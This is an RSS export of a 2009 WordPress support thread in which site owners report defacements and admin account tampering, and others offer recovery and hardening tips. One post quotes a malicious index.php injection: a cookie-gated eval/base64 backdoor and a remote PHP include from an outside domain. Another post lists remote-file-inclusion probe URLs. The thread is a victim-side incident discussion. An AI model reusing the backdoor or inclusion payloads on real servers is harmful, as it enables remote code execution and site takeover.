<?xml version="1.0" encoding="UTF-8"?><!-- generator="bbPress" -->

<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
>

<channel>
<title>WordPress &#8250; Support Topic: HACKED twice in one week ver 2.7</title>
<link>http://wordpress.org/support/</link>
<description>WordPress &#8250; Support Topic: HACKED twice in one week ver 2.7</description>
<language>en</language>
<pubDate>Thu, 26 Nov 2009 14:37:07 +0000</pubDate>

<item>
<title>elizabethrichardson on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1261612</link>
<pubDate>Wed, 28 Oct 2009 06:50:49 +0000</pubDate>
<dc:creator>elizabethrichardson</dc:creator>
<guid isPermaLink="false">1261612@http://wordpress.org/support/</guid>
<description>&#60;p&#62;My websites were hacked over the weekend as stated in a previous post.&#60;/p&#62;
&#60;p&#62;I've been watching the influx of traffic from various hacking forums that obviously list the details of websites hit in the last batch of attacks. &#60;/p&#62;
&#60;p&#62;What I am noticing now is strange activity entering a server document command etc sent to a txt file on another url containing php code.&#60;/p&#62;
&#60;p&#62;Can someone suggest what is happening and if this is how access is gained...???&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://south-gippsland.net_serverdocument_root=http//cyberirc.fileave.com/id1.txt?&#34; rel=&#34;nofollow&#34;&#62;http://south-gippsland.net_serverdocument_root=http//cyberirc.fileave.com/id1.txt?&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://south-gippsland.netaction=logout&#38;amp;siteurl=http//www.seeum.co.kr/zero/data/idxx.txt??&#34; rel=&#34;nofollow&#34;&#62;http://south-gippsland.netaction=logout&#38;amp;siteurl=http//www.seeum.co.kr/zero/data/idxx.txt??&#60;/a&#62;
&#60;/p&#62;</description>
</item>
<item>
<title>davewhittle on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1259667</link>
<pubDate>Mon, 26 Oct 2009 18:33:07 +0000</pubDate>
<dc:creator>davewhittle</dc:creator>
<guid isPermaLink="false">1259667@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I've also been hacked by QahTaN-SniPer, but on a GoDaddy shared account.  All 3 sites hacked were on the same shared Linux hosting account with GoDaddy, so I don't think it's only HostGator with the problem, although at least one of the hacked domains was once on HostGator.  GoDaddy is investigating now, but I'd sure like to know if this is a problem with shared hosting in general, GoDaddy/HostGator in particular, WordPress, or what - so I'll know what I need to do with any other accounts I have.&#60;/p&#62;
&#60;p&#62;Any information would be appreciated.&#60;/p&#62;
&#60;p&#62;Thanks,&#60;br /&#62;
 Dave
&#60;/p&#62;</description>
</item>
<item>
<title>Ipstenu on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1259589</link>
<pubDate>Mon, 26 Oct 2009 17:21:24 +0000</pubDate>
<dc:creator>Ipstenu</dc:creator>
<guid isPermaLink="false">1259589@http://wordpress.org/support/</guid>
<description>&#60;p&#62;&#60;a href=&#34;http://codex.wordpress.org/FAQ_My_site_was_hacked&#34; rel=&#34;nofollow&#34;&#62;http://codex.wordpress.org/FAQ_My_site_was_hacked&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;Admittedly, it sounds like your host sucks, to allow that level of hacking on the server level.  My last concern would be WP (my first would be 'How soon can I cancel my contract and MOVE?!')
&#60;/p&#62;</description>
</item>
<item>
<title>elizabethrichardson on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1259240</link>
<pubDate>Mon, 26 Oct 2009 09:57:23 +0000</pubDate>
<dc:creator>elizabethrichardson</dc:creator>
<guid isPermaLink="false">1259240@http://wordpress.org/support/</guid>
<description>&#60;p&#62;My entire hosting account consisting of around 22 websites (sub domains were not affected) was hit by the Palestine Telecommunications Company (paltel) (213.6.76.87) hacker over the weekend.&#60;/p&#62;
&#60;p&#62;20 x were running wordpress 2.8.4 or 2.8.5 and 2 x were created with frontpage, and my web host manager password needed to be reset so I could get access to overwrite index.php.&#60;/p&#62;
&#60;p&#62;I'm really confused about how to clear any other potential problems created by this hacker and all I've done so far is change passwords. Any other solutions would be greatly appreciated.&#60;/p&#62;
&#60;p&#62;All websites involved were hosted with Lonex Resellers.
&#60;/p&#62;</description>
</item>
<item>
<title>davespeaking on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1111358</link>
<pubDate>Sat, 20 Jun 2009 23:31:52 +0000</pubDate>
<dc:creator>davespeaking</dc:creator>
<guid isPermaLink="false">1111358@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I got hit by this hacker today.&#60;/p&#62;
&#60;p&#62;I'm running Wordpress 2.7 with the Thesis 1.4.2 theme.&#60;/p&#62;
&#60;p&#62;As described above, the hacker changed the homepage and altered the ADMIN user password.  He also deleted my other user accounts.&#60;/p&#62;
&#60;p&#62;I fixed the problem by following the directions provided by freeon (ThankYou!).  I went into PHPadmin and changed my admin password and reinstalled the Thesis Theme.&#60;/p&#62;
&#60;p&#62;A true pain in the ass, but not a catastrophe thanks to this invaluable forum.&#60;/p&#62;
&#60;p&#62;Dave&#60;/p&#62;
&#60;p&#62;Keywords : Saudi Arabia, qahtan-sniper, hacked, cobra
&#60;/p&#62;</description>
</item>
<item>
<title>sairah on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1093031</link>
<pubDate>Fri, 05 Jun 2009 20:03:08 +0000</pubDate>
<dc:creator>sairah</dc:creator>
<guid isPermaLink="false">1093031@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Oh no!  I don't want that to happen!  Thanks so much for posting this!  I'll definitely try to look into it, even though I've removed the defacement.  Would it still happen if I've removed the defacement?  O.o
&#60;/p&#62;</description>
</item>
<item>
<title>chaoskaizer on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1078412</link>
<pubDate>Wed, 20 May 2009 01:02:04 +0000</pubDate>
<dc:creator>chaoskaizer</dc:creator>
<guid isPermaLink="false">1078412@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi sairah,&#60;br /&#62;
Seem like you are on bad hosting network. The best approach is contact your host &#38;amp; send them this link &#60;a href=&#34;http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=en-US&#38;amp;site=AS:6939&#34;&#62;AS6939 (HURRICANE)&#60;/a&#62; (you are within the same network). Ask them to fixes those mess because your domain is already inside the safebrowsing network list. You might get banned from major search engine if they don't do anything.
&#60;/p&#62;</description>
</item>
<item>
<title>sairah on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1077389</link>
<pubDate>Mon, 18 May 2009 22:51:39 +0000</pubDate>
<dc:creator>sairah</dc:creator>
<guid isPermaLink="false">1077389@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I'm having the same problem (it's just a defacement though, although so annoying, particularly since I'm not savvy to the level that I know how to fix it!).  I run on Host Department...their service has not been the best, to be honest, but they give a lot of space and so I've stuck with them...&#60;/p&#62;
&#60;p&#62;But honestly, I get this fugly thing as my homepage:&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://www.sairah.endless-time.net&#34; rel=&#34;nofollow&#34;&#62;http://www.sairah.endless-time.net&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;If anyone has ANY idea how to deal with this, please let me know, I'm at a loss ='(
&#60;/p&#62;</description>
</item>
<item>
<title>jean01 on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1076492</link>
<pubDate>Sun, 17 May 2009 19:08:55 +0000</pubDate>
<dc:creator>jean01</dc:creator>
<guid isPermaLink="false">1076492@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I am hosted on hostgator and I have not been hacked.&#60;/p&#62;
&#60;p&#62;I use many of the hints at &#60;a href=&#34;http://codex.wordpress.org/Hardening_WordPress&#34;&#62;Hardening Wordpress&#60;/a&#62; maybe that's why.&#60;/p&#62;
&#60;p&#62;I have 4 blogs at hostgator on 4 different domains and none of them has been hacked. &#60;/p&#62;
&#60;p&#62;I also have a complete FTP backup of my installation and have automated database backups emailed to me.&#60;/p&#62;
&#60;p&#62;Hope that this helps.  &#60;/p&#62;
&#60;p&#62;jean&#60;br /&#62;
ps&#60;br /&#62;
watch me get hacked tomorrow now that i have posted this (fingers crossed)
&#60;/p&#62;</description>
</item>
<item>
<title>roxyghost on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1046377</link>
<pubDate>Wed, 15 Apr 2009 10:41:29 +0000</pubDate>
<dc:creator>roxyghost</dc:creator>
<guid isPermaLink="false">1046377@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I'm hosted on Heart Internet and got hacked just over a week ago (2.7). They used the forgot password functionality somehow to change the password and then used the theme editor to upload their files. Think it was just a defacement but since I was away last week I have yet to go through everything and restore it to normality.&#60;/p&#62;
&#60;p&#62;The odd thing was, I checked my stats and they found my blog by searching MSN search for the IP of the heart server and the word &#34;wordpress&#34;.&#60;/p&#62;
&#60;p&#62;Would appreciate some thoughts on this!
&#60;/p&#62;</description>
</item>
<item>
<title>whooami on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1013978</link>
<pubDate>Fri, 13 Mar 2009 00:51:52 +0000</pubDate>
<dc:creator>whooami</dc:creator>
<guid isPermaLink="false">1013978@http://wordpress.org/support/</guid>
<description>&#60;p&#62;A small orange &#38;gt;&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://www.asmallorange.com/services/hosting/&#34; rel=&#34;nofollow&#34;&#62;http://www.asmallorange.com/services/hosting/&#60;/a&#62;
&#60;/p&#62;</description>
</item>
<item>
<title>silvalex on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-1013974</link>
<pubDate>Fri, 13 Mar 2009 00:49:04 +0000</pubDate>
<dc:creator>silvalex</dc:creator>
<guid isPermaLink="false">1013974@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Does anyone have a more secure host they would recommend that is cost effective?
&#60;/p&#62;</description>
</item>
<item>
<title>samboll on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-992080</link>
<pubDate>Fri, 20 Feb 2009 02:30:30 +0000</pubDate>
<dc:creator>samboll</dc:creator>
<guid isPermaLink="false">992080@http://wordpress.org/support/</guid>
<description>&#60;p&#62;yea - folks need to realize on shared servers that 90% of hacks come from someone having crappy security on their site or the host them self has crappy security.&#60;br /&#62;
Then there's the 10% who think upgrades are a pain and put them off.&#60;br /&#62;
:&#38;gt;)
&#60;/p&#62;</description>
</item>
<item>
<title>whooami on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-992046</link>
<pubDate>Fri, 20 Feb 2009 02:15:57 +0000</pubDate>
<dc:creator>whooami</dc:creator>
<guid isPermaLink="false">992046@http://wordpress.org/support/</guid>
<description>&#60;p&#62;you noticed that too, sam ... :P
&#60;/p&#62;</description>
</item>
<item>
<title>samboll on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-992043</link>
<pubDate>Fri, 20 Feb 2009 02:14:00 +0000</pubDate>
<dc:creator>samboll</dc:creator>
<guid isPermaLink="false">992043@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I think you folks with Hostgator have a serious problem. This is the 3rd thread I've seen with hacked blogs and them as host- I would be asking them what the...?
&#60;/p&#62;</description>
</item>
<item>
<title>kjodies on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-991984</link>
<pubDate>Fri, 20 Feb 2009 01:29:05 +0000</pubDate>
<dc:creator>kjodies</dc:creator>
<guid isPermaLink="false">991984@http://wordpress.org/support/</guid>
<description>&#60;p&#62;sunny51: Every single file on your server has changed and now you think you can prove, that &#34;Get Recent Comments&#34; contains malicious code? Maybe it does on your server, but of course it does not in it's original state, when you downloaded it from &#60;a href=&#34;http://wordpress.org/extend/plugins/get-recent-comments/&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/extend/plugins/get-recent-comments/&#60;/a&#62;.
&#60;/p&#62;</description>
</item>
<item>
<title>sunny51 on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-980315</link>
<pubDate>Mon, 09 Feb 2009 11:09:01 +0000</pubDate>
<dc:creator>sunny51</dc:creator>
<guid isPermaLink="false">980315@http://wordpress.org/support/</guid>
<description>&#60;p&#62;&#60;strong&#62;UPDATE:&#60;/strong&#62;&#60;br /&#62;
Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments..&#60;/p&#62;
&#60;blockquote&#62;&#60;p&#62;todo.cache was found in a plugin directory named &#34;Get Recent Comments&#34;.&#60;br /&#62;
The &#34;picture&#34; file was found in the Uploads folder, where normal pictures reside... &#60;/p&#62;&#60;/blockquote&#62;
&#60;p&#62;We are tightening security on the blogs and will update when complete
&#60;/p&#62;</description>
</item>
<item>
<title>sunny51 on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-980248</link>
<pubDate>Mon, 09 Feb 2009 08:44:29 +0000</pubDate>
<dc:creator>sunny51</dc:creator>
<guid isPermaLink="false">980248@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi,&#60;/p&#62;
&#60;p&#62;We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can't log in to your blog and are send into a loop (no error message either).&#60;/p&#62;
&#60;p&#62;Once we check the DB users table we have a new user called WordPress and then I assume there is some new content added to the blog although we were not able to find it. Look for some comment spam and maybe new content.&#60;/p&#62;
&#60;p&#62;The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can't tell which files were changed and we must assume everything is compromised.&#60;/p&#62;
&#60;p&#62;The attack includes the addition of these lines into index.php and xmlrpc.php was also changed. &#60;strong&#62;This is index.php&#60;/strong&#62;:&#60;/p&#62;
&#60;pre&#62;&#60;code&#62;&#38;lt;?php if(md5($_COOKIE[&#38;#39;c9a8b336f8ead0e0&#38;#39;])==&#38;quot;5dfa4a678793aeaee3d9394d72d12147&#38;quot;){ eval(base64_decode($_POST[&#38;#39;file&#38;#39;])); exit; } ?&#38;gt;&#38;lt;?php
/**
 * Front to the WordPress application. This file doesn&#38;#39;t do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define(&#38;#39;WP_USE_THEMES&#38;#39;, true);

/** Loads the WordPress Environment and Template */
if (isset($_GET[&#38;#39;license&#38;#39;])) {
	@include(&#38;#39;http://wordpress.net.in/license.txt&#38;#39;);
} else {
	require(&#38;#39;./wp-blog-header.php&#38;#39;);
}
?&#38;gt;&#60;/code&#62;&#60;/pre&#62;
&#60;p&#62;We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely. &#60;/p&#62;
&#60;p&#62;I am worried that there is 2.7 vulnerability that is easily exploitable, if anyone has any ideas please let me know...&#60;/p&#62;
&#60;p&#62;THANKS :)
&#60;/p&#62;</description>
</item>
<item>
<title>freeon on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-973208</link>
<pubDate>Mon, 02 Feb 2009 01:51:59 +0000</pubDate>
<dc:creator>freeon</dc:creator>
<guid isPermaLink="false">973208@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I'm using hostgator too. I have done what wpsec has suggested. So far so good. They hacked multiple wp sites of mine. Easy enough to fix...just a waste of time. In the real world I have to deal with idiots tagging my garage with graffiti. In cyberspace its children hacking. Pull yourself up by your bootstraps and keep on walking...lol. I make money on the internet...hackers waste their lives on the internet! At the end of the day I win.
&#60;/p&#62;</description>
</item>
<item>
<title>mgarabed on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-966182</link>
<pubDate>Sun, 25 Jan 2009 19:24:27 +0000</pubDate>
<dc:creator>mgarabed</dc:creator>
<guid isPermaLink="false">966182@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Freeon, my wordpress sites and one non wordpress site were also hacked into by the same assassin hackers on friday night/saturday morning (multiple sites, but one hosting account).  Seems like a defacement only. Have you done anything furthur to secure your setup? Also, I am using hostgator, and I don't know if it has anything to do with them or not. I changed the index.html pages. Rather annoying..
&#60;/p&#62;</description>
</item>
<item>
<title>freeon on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-965667</link>
<pubDate>Sun, 25 Jan 2009 05:35:26 +0000</pubDate>
<dc:creator>freeon</dc:creator>
<guid isPermaLink="false">965667@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Wpsec thanks for the additional info...well received. Additionally I found the forum that the hackers hang out, trade their hacking software and boast about their so called defacements. &#60;a href=&#34;http://arabic-m.com/index.php?page=mirror&#38;#38;id=18268&#34; rel=&#34;nofollow&#34;&#62;http://arabic-m.com/index.php?page=mirror&#38;#38;id=18268&#60;/a&#62; might be a good idea for security to reverse engineer their hacking software to prevent future attacks. Little children must play cat and mouse.
&#60;/p&#62;</description>
</item>
<item>
<title>wpsec on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-964957</link>
<pubDate>Sat, 24 Jan 2009 07:04:03 +0000</pubDate>
<dc:creator>wpsec</dc:creator>
<guid isPermaLink="false">964957@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I've fixed many hacks like this in the past few months alone. Do your site 3 favors: &#60;/p&#62;
&#60;p&#62;1. Create a new administrator user (so that it doesn't have ID 1 in the database) then delete any other administrator accounts that you don't need. And since you've already set your password using MD5 go reset it to something new (using the reset password feature of Wordpress) so that it will use the encryption 'salt' built into more recent WP versions, otherwise your MD5 passwords are subject to dictionary attacks and rainbow table attacks...&#60;/p&#62;
&#60;p&#62;2. Remove write permissions from all of your theme files. You will no longer be able to edit your theme files using the WP theme editor but that's a small price to pay. &#60;/p&#62;
&#60;p&#62;3. Sign up to get the soon-to-be-released beta of &#60;a href=&#34;http://wpsecurity.net&#34;&#62;Maximum Security for Wordpress&#60;/a&#62;. Ya, that's a shameless plug... I hope it helps you though.&#60;/p&#62;
&#60;p&#62;Finally, don't believe for one second that you've really identified the bad guys responsible for messing with your sites. It's extremely easy to cover one's tracks on the Internet and make it look as though someone else is responsible for whatever activity. &#34;False flag&#34; operations are incredibly common. Most bad guys already know how to do that and do it as a matter of habit. To really track down a bad guy typically requires the cooperation of many ISPs across the world - although once in a while a bad guy turns out to be a complete idiot that is all too easy find. That's rather rare.
&#60;/p&#62;</description>
</item>
<item>
<title>freeon on "HACKED twice in one week ver 2.7"</title>
<link>http://wordpress.org/support/topic/237003#post-964789</link>
<pubDate>Sat, 24 Jan 2009 01:35:27 +0000</pubDate>
<dc:creator>freeon</dc:creator>
<guid isPermaLink="false">964789@http://wordpress.org/support/</guid>
<description>&#60;p&#62;My sites are being hacked like wildfire. I am madder than a hornet. Wordpress ver 2.7&#60;br /&#62;
They change the theme index.php to display a pic of a cobra with the Assassin Hackers moniker.&#60;br /&#62;
FIX&#60;br /&#62;
Upload your original theme that you are using index.php to fix the site.&#60;br /&#62;
They also delete the admin user #1 from the mysql database.&#60;br /&#62;
Use phpmyadmin in your cpanel to access your database.&#60;br /&#62;
Select your database on the left sidebar&#60;br /&#62;
Find wp_users and select browse&#60;br /&#62;
Note that user 1 is missing...thats what the hacker deleted&#60;br /&#62;
My easy fix is to take another id 2 or 3 etc and click edit&#60;br /&#62;
Change id value to &#60;strong&#62;1&#60;/strong&#62;&#60;br /&#62;
Change user_login value to &#60;strong&#62;your username&#60;/strong&#62;&#60;br /&#62;
user_pass row set function to &#60;strong&#62;MD5&#60;/strong&#62; and value to &#60;strong&#62;your password&#60;/strong&#62;&#60;br /&#62;
Change user_name value to &#60;strong&#62;your username&#60;/strong&#62;&#60;br /&#62;
Click &#60;strong&#62;Go&#60;/strong&#62;&#60;/p&#62;
&#60;p&#62;You are now a little less frustrated because you can now log into your admin panel but are ticked off that your site has been hacked twice in the last week. Your hosting provider can not stop the attacks and tells you to upgrade to the latest version of wordpress which you are already running.&#60;/p&#62;
&#60;p&#62;These are who the hackers were:&#60;/p&#62;
&#60;p&#62;Rafah, Palestinian Territory&#60;br /&#62;
Palestine Telecommunications Company (paltel) (213.6.180.183)&#60;/p&#62;
&#60;p&#62;Riyadh, Ar Riyad, Saudi Arabia&#60;br /&#62;
Nesma (89.4.242.73)&#60;/p&#62;
&#60;p&#62;Hosting co banned their ip's but said all they need to do is reset their modems and they are back in again with new ip's
&#60;/p&#62;</description>
</item>

</channel>
</rss>
